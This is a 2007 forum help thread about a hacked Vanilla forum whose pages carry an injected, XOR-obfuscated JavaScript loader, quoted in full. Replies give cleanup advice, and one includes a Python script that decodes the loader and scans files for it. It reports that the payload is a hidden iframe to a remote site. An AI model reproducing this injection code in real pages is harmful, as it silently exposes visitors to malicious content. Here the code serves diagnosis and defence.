
Javascript Worm? "testws35fdgh"

edited April 2007 in Vanilla 1.0 Help
Website located: http://www.diffusion.us/v2/

So I visited my website today, and my NoScript Firefox extension was going crazy asking me to allow JavaScript. I haven't put any JS on any of my webpages (aside from anything associated with Vanilla, of course). I checked out the code, and there's a bunch of these:

    <div id="testws35fdgh"></div>
    <script language="JavaScript">
    var0 = "\x69\x3c\x33\x27\x34\x38\x30\x75\x3b\x34";
    var1 = "\x38\x30\x68\x72\x36\x3a\x20\x3b\x21\x30";
    var2 = "\x27\x72\x75\x26\x27\x36\x68\x72\x3d\x21";
    var3 = "\x21\x25\x6f\x7a\x7a\x26\x21\x30\x39\x34";
    var4 = "\x34\x27\x21\x3a\x3c\x26\x7b\x27\x20\x7a";
    var5 = "\x3c\x3b\x31\x30\x2d\x67\x7b\x25\x3d\x25";
    var6 = "\x72\x75\x3d\x30\x3c\x32\x3d\x21\x68\x72";
    var7 = "\x64\x63\x72\x75\x22\x3c\x31\x21\x3d\x68";
    var8 = "\x72\x64\x63\x72\x75\x33\x27\x34\x38\x30";
    var9 = "\x37\x3a\x27\x31\x30\x27\x68\x72\x65\x72";
    var10 = "\x75\x26\x36\x27\x3a\x39\x39\x3c\x3b\x32";
    var11 = "\x68\x72\x3b\x3a\x72\x6b\x69\x7a\x3c\x33";
    var12 = "\x27\x34\x38\x30\x6b";
    sr = var0+var1+var2+var3+var4+var5+var6+var7+var8+var9+var10+var11+var12;
    dst = "";
    for(i = 0; i < sr.length; i++) {
        var d = parseInt(sr.charCodeAt(i) ^ 85);
        dst = dst + String.fromCharCode(d);
    }
    document.getElementById("testws35fdgh").innerHTML = dst;
    </script>

Could someone let me know what's going on here? Thanks

Comments

  • Your server has been hacked. Back up everything to check how the code has been injected. Save your access log as well. And reinstall the forum, without extensions.
  • Mark (Vanilla Staff)
    Follow Dinoboff's advice and definitely speak with your hosting provider. If you are on a shared server, another site may have been the hole and the entire server could have been affected.
  • Wow. I just googled for "testws35fdgh", and you don't seem to be alone in being infected. Most google results actually just seem to be infected sites, with one thing over at wordpress support which just states the problem, and that it is resolved (not how or anything), and one usenet discussion about it (I also found out that a number of forums take usenet discussions and make threads of them, for instance this thread which is a copy of the alt.comp.virus thread).

    Anyway, if yours is the same as the one discussed, that thing apparently opens an iframe to framestat.net/index2.php (a domain that has been suspended).
  • Well, as soon as I found that code in index.php, I changed my password to a harder one. I also removed the code from index.php. But there are still about 20 occurrences of the code when I view the source. Does anyone have ideas to find the rest of the code? Or should I just try a new install? @Mark: I'm pretty sure what you said has happened. I was having problems with a phpBB installation, so I submitted a support ticket to my host's website. I went back later to check on the ticket, and the entire site had been acting funky, probably now from the worm. Thanks to everyone for your help.
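    Two questions in this thread can be answered offline: what the obfuscated script in the opening post actually writes into its div, and how to find the remaining copies of it across a web root. The script below is an added example, not code from the thread or from Vanilla: it mirrors the loader's own decode step (concatenate the hex-escaped string literals, XOR every byte with the constant from the `charCodeAt(i) ^ 85` loop) in Python so the payload can be read without executing it in a browser, and walks a directory tree for files that carry the `testws35fdgh` marker or the same hex-literal-plus-XOR shape. The sample site it scans is a constructed fixture written to a temporary directory; the only real input is the snippet copied verbatim from the post.

    ```python
    import os
    import re
    import tempfile

    # Constructed fixture: the injected loader quoted in the opening post, copied
    # verbatim so the decoder below can be checked against the real sample.
    INJECTED_SNIPPET = r'''<div id="testws35fdgh"></div>
    <script language="JavaScript">
    var0 = "\x69\x3c\x33\x27\x34\x38\x30\x75\x3b\x34";
    var1 = "\x38\x30\x68\x72\x36\x3a\x20\x3b\x21\x30";
    var2 = "\x27\x72\x75\x26\x27\x36\x68\x72\x3d\x21";
    var3 = "\x21\x25\x6f\x7a\x7a\x26\x21\x30\x39\x34";
    var4 = "\x34\x27\x21\x3a\x3c\x26\x7b\x27\x20\x7a";
    var5 = "\x3c\x3b\x31\x30\x2d\x67\x7b\x25\x3d\x25";
    var6 = "\x72\x75\x3d\x30\x3c\x32\x3d\x21\x68\x72";
    var7 = "\x64\x63\x72\x75\x22\x3c\x31\x21\x3d\x68";
    var8 = "\x72\x64\x63\x72\x75\x33\x27\x34\x38\x30";
    var9 = "\x37\x3a\x27\x31\x30\x27\x68\x72\x65\x72";
    var10 = "\x75\x26\x36\x27\x3a\x39\x39\x3c\x3b\x32";
    var11 = "\x68\x72\x3b\x3a\x72\x6b\x69\x7a\x3c\x33";
    var12 = "\x27\x34\x38\x30\x6b";
    sr = var0+var1+var2+var3+var4+var5+var6+var7+var8+var9+var10+var11+var12;
    dst = "";
    for(i = 0; i < sr.length; i++) { var d = parseInt(sr.charCodeAt(i) ^ 85); dst = dst + String.fromCharCode(d); }
    document.getElementById("testws35fdgh").innerHTML = dst;
    </script>'''

    MARKER = "testws35fdgh"
    # A JS string literal made entirely of \xNN escapes, as var0..var12 are.
    HEX_LITERAL = re.compile(r'"((?:\\x[0-9a-fA-F]{2})+)"')
    # The per-character XOR in the loader's decode loop, e.g. charCodeAt(i) ^ 85.
    XOR_KEY = re.compile(r'charCodeAt\(\w+\)\s*\^\s*(\d+)')


    def decode_xor_payload(script_text):
        """Recover the string the loader writes into its <div>, or None.

        The loader splits a hex-escaped string across var0..varN, concatenates
        them in order and XORs each byte with a constant. Doing the same here
        exposes the payload without ever running the script.
        """
        key_match = XOR_KEY.search(script_text)
        if key_match is None:
            return None
        key = int(key_match.group(1))
        raw = bytes(
            int(h, 16)
            for literal in HEX_LITERAL.findall(script_text)   # in source order
            for h in re.findall(r'\\x([0-9a-fA-F]{2})', literal)
        )
        return "".join(chr(b ^ key) for b in raw)


    def scan_webroot(root):
        """Return {relative_path: decoded_payload_or_None} for suspicious files.

        A file is reported when it contains the marker div id, or when it has
        hex-escape-only string literals next to a charCodeAt(...) ^ N loop.
        Unreadable files are skipped; the text is read with errors ignored so
        binaries do not abort the walk.
        """
        hits = {}
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                path = os.path.join(dirpath, name)
                try:
                    with open(path, encoding="utf-8", errors="ignore") as fh:
                        text = fh.read()
                except OSError:
                    continue
                if MARKER in text or (HEX_LITERAL.search(text) and XOR_KEY.search(text)):
                    hits[os.path.relpath(path, root)] = decode_xor_payload(text)
        return hits


    def build_sample_site(root):
        """Constructed fixture: one clean extension file and two infected PHP
        files, so the scanner has a realistic tree to walk. Not a real server."""
        os.makedirs(os.path.join(root, "extensions"), exist_ok=True)
        files = {
            "index.php": "<?php echo 'hello'; ?>\n" + INJECTED_SNIPPET,
            os.path.join("extensions", "Feed.php"): "<?php // untouched ?>\n",
            "people.php": "<?php ?>\n" + INJECTED_SNIPPET,
        }
        for rel, content in files.items():
            with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
                fh.write(content)


    def run_demo():
        """Build the fixture in a temp dir, scan it, and return the hits."""
        with tempfile.TemporaryDirectory() as root:
            build_sample_site(root)
            return scan_webroot(root)


    if __name__ == "__main__":
        for path, payload in sorted(run_demo().items()):
            print(path, "->", payload)
    ```

    Run against the snippet from the opening post, `decode_xor_payload` returns a hidden 16x16 `<iframe>` whose `src` is `http://stelaartois.ru/index2.php`, a different host from the `framestat.net` one mentioned earlier in the thread, so copies of this injection differ in where they point and the decoded URL is worth recording for each one. The hex-literal heuristic will also flag legitimate code that XORs character codes, so treat scanner hits as candidates for review, not proof of infection; the marker match is the reliable part.
    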
  • The important things are the content in the DB and the settings in the conf folder. The easiest thing to do is to save the files in conf/ and clean them up. Wipe out the rest. Download the core and the extensions and put your settings files back in conf/.
  • Mark (Vanilla Staff)
    What Dinoboff said.

    Here's what I'd do:

    1. Back up your database.
    2. Download a copy to local (it's good to do this once in a while anyway).
    3. Download everything in your Vanilla conf folder.
    4. Open up your Vanilla conf folder and clean out any worm code.
    5. Wipe out all of your Vanilla files on the server.
    6. Download the new version of Vanilla.
    7. Upload the new Vanilla files and run a fresh install - use a new dummy database when installing.
    8. Download and re-install all of your Vanilla add-ons in your blank Vanilla forum.
    9. Re-upload your conf/settings.php and conf/database.php files so you point back at the old database and use your old configuration settings.
    10. Verify everything works as it should.
  • Thanks, Mark. I'm currently looking for some new web hosting. I'd rather just do away with this whole host. Their support website looks like it's been affected by the worm as well.
  • *bump* For my curiosity, can you please identify 'this whole host' and 'their support website'? This could also be seen as a PSA. Thank you.